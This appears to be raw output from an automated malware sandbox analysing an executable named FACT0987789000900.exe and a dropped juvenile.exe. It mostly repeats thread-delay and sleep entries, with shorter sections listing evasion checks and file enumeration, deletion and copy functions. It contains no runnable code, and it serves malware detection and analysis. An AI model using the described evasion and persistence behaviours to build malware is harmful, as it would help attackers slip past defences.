Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597769	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597631	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597436	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597309	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595108	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594994	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594555	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594399	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594061	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598696	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595817	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595599	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595331	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593828	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 7483	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 2347	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 4353	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 5470	Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Evaded block: after key decision			graph_3-93804
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Evaded block: after key decision

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-94690

Source: C:\Users\user\Desktop\FACT0987789000900.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	API coverage: 4.8 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7464	Thread sleep count: 7483 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7464	Thread sleep count: 2347 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599670s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599558s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598342s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597769s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597631s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597436s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597309s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597200s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595874s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -595108s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594994s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594670s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594555s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594399s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594280s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594170s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7460	Thread sleep time: -594061s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7772	Thread sleep count: 4353 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7772	Thread sleep count: 5470 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599296s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598696s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598587s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597483s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596827s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595817s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595599s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595331s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7756	Thread sleep time: -593828s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	3_2_004D6CA9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	3_2_004D60DD
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	3_2_004D63F9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_004DEB60
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DF56F FindFirstFileW,FindClose,	3_2_004DF56F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_004DF5FA
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_004E1B2F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_004E1C8A
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_004E1F94
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00916CA9 GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00916CA9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	6_2_009160DD
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	6_2_009163F9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0091EB60
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0091F5FA
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091F56F FindFirstFileW,FindClose,	6_2_0091F56F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00921B2F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00921C8A
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00921F94

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004ADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_004ADDC0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599558	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597769	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597631	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597436	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597309	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597093	Jump to behavior
